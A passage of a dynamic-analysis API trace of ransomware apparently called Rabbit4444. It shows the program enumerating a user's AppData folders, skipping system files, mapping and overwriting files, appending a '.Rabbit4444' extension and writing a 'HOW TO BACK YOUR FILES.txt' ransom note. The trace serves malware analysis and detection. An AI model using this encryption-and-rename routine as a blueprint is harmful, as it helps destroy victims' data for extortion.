[0070.812] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.812] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.812] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.812] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.812] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf385cb58, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf385cb58, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf3882d4b, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.812] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.812] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.812] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cda2619, ftCreationTime.dwHighDateTime=0x1d327c0, ftLastAccessTime.dwLowDateTime=0x1cda2619, ftLastAccessTime.dwHighDateTime=0x1d327c0, ftLastWriteTime.dwLowDateTime=0x1cdeead5, ftLastWriteTime.dwHighDateTime=0x1d327c0, nFileSizeHigh=0x0, nFileSizeLow=0x909e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1504778419", cAlternateFileName="150477~2")) returned 1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="Rabbit4444.exe") returned -1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2=".") returned 1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="..") returned 1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="windows") returned -1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="bootmgr") returned -1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="pagefile.sys") returned -1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="boot") returned -1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="ids.txt") returned -1 [0070.812] lstrcmpiW (lpString1="1504778419", lpString2="NTUSER.DAT") returned -1 [0070.812] lstrcpyW (in: lpString1=0x130ec56, lpString2="1504778419" | out: lpString1="1504778419") returned="1504778419" [0070.812] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1504778419", dwFileAttributes=0x0) returned 1 [0070.812] lstrlenW (lpString="1504778419") returned 10 [0070.812] lstrlenW (lpString="Rabbit4444") returned 10 [0070.813] lstrcmpiW (lpString1="1504778419", lpString2="Rabbit4444") returned -1 [0070.813] lstrlenW (lpString=".dll") returned 4 [0070.813] lstrcmpiW (lpString1="8419", lpString2=".dll") returned 1 [0070.813] lstrlenW (lpString=".lnk") returned 4 [0070.813] lstrcmpiW (lpString1="8419", lpString2=".lnk") returned 1 [0070.813] lstrlenW (lpString=".ini") returned 4 [0070.813] lstrcmpiW (lpString1="8419", lpString2=".ini") returned 1 [0070.813] lstrlenW (lpString=".sys") returned 4 [0070.813] lstrcmpiW (lpString1="8419", lpString2=".sys") returned 1 [0070.813] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1504778419" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280819\\1504778419"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.813] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.813] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16212392139) returned 1 [0070.813] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=37022) returned 1 [0070.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0070.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0070.813] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x93a0, lpName=0x0) returned 0x27c [0070.814] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x93a0) returned 0x70000 [0070.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x104e60 [0070.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0070.817] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104e60 | out: hHeap=0xe0000) returned 1 [0070.817] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0070.818] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104e60 [0070.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0070.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104e60 | out: hHeap=0xe0000) returned 1 [0070.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0070.818] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16212864993) returned 1 [0070.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0070.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0070.818] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.818] CloseHandle (hObject=0x27c) returned 1 [0070.818] CloseHandle (hObject=0x260) returned 1 [0070.819] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1504778419.Rabbit4444") returned 164 [0070.819] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1504778419" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280819\\1504778419"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1504778419.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280819\\1504778419.rabbit4444"), dwFlags=0x1) returned 1 [0070.819] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9373faf, ftCreationTime.dwHighDateTime=0x1d336c5, ftLastAccessTime.dwLowDateTime=0xa9373faf, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa940ca9b, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x19d78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1506430069", cAlternateFileName="150643~1")) returned 1 [0070.819] lstrcmpiW (lpString1="1506430069", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.819] lstrcmpiW (lpString1="1506430069", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.819] lstrcmpiW (lpString1="1506430069", lpString2="Rabbit4444.exe") returned -1 [0070.819] lstrcmpiW (lpString1="1506430069", lpString2=".") returned 1 [0070.819] lstrcmpiW (lpString1="1506430069", lpString2="..") returned 1 [0070.819] lstrcmpiW (lpString1="1506430069", lpString2="windows") returned -1 [0070.820] lstrcmpiW (lpString1="1506430069", lpString2="bootmgr") returned -1 [0070.820] lstrcmpiW (lpString1="1506430069", lpString2="pagefile.sys") returned -1 [0070.820] lstrcmpiW (lpString1="1506430069", lpString2="boot") returned -1 [0070.820] lstrcmpiW (lpString1="1506430069", lpString2="ids.txt") returned -1 [0070.820] lstrcmpiW (lpString1="1506430069", lpString2="NTUSER.DAT") returned -1 [0070.820] lstrcpyW (in: lpString1=0x130ec56, lpString2="1506430069" | out: lpString1="1506430069") returned="1506430069" [0070.820] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1506430069", dwFileAttributes=0x0) returned 1 [0070.820] lstrlenW (lpString="1506430069") returned 10 [0070.820] lstrlenW (lpString="Rabbit4444") returned 10 [0070.820] lstrcmpiW (lpString1="1506430069", lpString2="Rabbit4444") returned -1 [0070.820] lstrlenW (lpString=".dll") returned 4 [0070.820] lstrcmpiW (lpString1="0069", lpString2=".dll") returned 1 [0070.820] lstrlenW (lpString=".lnk") returned 4 [0070.820] lstrcmpiW (lpString1="0069", lpString2=".lnk") returned 1 [0070.820] lstrlenW (lpString=".ini") returned 4 [0070.821] lstrcmpiW (lpString1="0069", lpString2=".ini") returned 1 [0070.821] lstrlenW (lpString=".sys") returned 4 [0070.821] lstrcmpiW (lpString1="0069", lpString2=".sys") returned 1 [0070.821] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1506430069" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280819\\1506430069"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0070.821] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.821] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16213177207) returned 1 [0070.821] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=105848) returned 1 [0070.821] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0070.821] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0070.821] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a080, lpName=0x0) returned 0x27c [0070.822] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a080) returned 0x70000 [0070.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x104e60 [0070.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0070.828] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104e60 | out: hHeap=0xe0000) returned 1 [0070.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0070.828] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x104e60 [0070.828] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0070.828] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104e60 | out: hHeap=0xe0000) returned 1 [0070.828] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0070.828] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16213894479) returned 1 [0070.828] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0070.828] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0070.828] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.829] CloseHandle (hObject=0x27c) returned 1 [0070.829] CloseHandle (hObject=0x260) returned 1 [0070.830] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1506430069.Rabbit4444") returned 164 [0070.830] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1506430069" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280819\\1506430069"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\1506430069.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280819\\1506430069.rabbit4444"), dwFlags=0x1) returned 1 [0070.830] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x475d1af1, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa9fab273, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xa40aa9b1, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.830] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.830] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.830] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.830] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.831] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.831] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.831] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.831] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.831] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.831] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.831] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.831] lstrcpyW (in: lpString1=0x130ec56, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.831] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.833] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.834] lstrlenW (lpString="Rabbit4444") returned 10 [0070.834] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.834] lstrlenW (lpString=".dll") returned 4 [0070.834] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.834] lstrlenW (lpString=".lnk") returned 4 [0070.834] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.834] lstrlenW (lpString=".ini") returned 4 [0070.834] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.834] lstrlenW (lpString=".sys") returned 4 [0070.834] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.834] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x475d1af1, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x475d1af1, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa277db3c, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.834] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.834] lstrcpyW (in: lpString1=0x130ec56, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.834] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.834] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.834] lstrlenW (lpString="Rabbit4444") returned 10 [0070.834] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.834] lstrlenW (lpString=".dll") returned 4 [0070.835] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.835] lstrlenW (lpString=".lnk") returned 4 [0070.835] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.835] lstrlenW (lpString=".ini") returned 4 [0070.835] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.835] lstrlenW (lpString=".sys") returned 4 [0070.835] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.835] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x475d1af1, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x475d1af1, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa277db3c, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.835] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0070.835] lstrcpyW (in: lpString1=0x130ec56, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.835] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280819\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280819\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0070.835] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0070.836] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.837] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.837] CloseHandle (hObject=0x260) returned 1 [0070.837] CloseHandle (hObject=0x228) returned 1 [0070.837] GetCurrentThreadId () returned 0xd98 [0070.837] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0070.837] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815" [0070.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x104d38 | out: hHeap=0xe0000) returned 1 [0070.837] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0070.837] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815" [0070.837] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\" [0070.837] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\.BFC0E91B00AE8A0620D3" [0070.837] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\280815\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0070.841] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.844] FlushFileBuffers (hFile=0x228) returned 1 [0070.844] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.845] CloseHandle (hObject=0x228) returned 1 [0070.845] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815") returned 142 [0070.845] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.845] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\280815\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c100a2, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xb0a11d08, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf38cf2ae, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1026d0 [0070.845] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.845] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.845] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.845] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.845] FindNextFileW (in: hFindFile=0x1026d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3c100a2, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xb0a11d08, ftLastAccessTime.dwHighDateTime=0x1d336d8, ftLastWriteTime.dwLowDateTime=0xf38cf2ae, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.845] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.845] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.845] lstrcmpiW (lpString1="..", 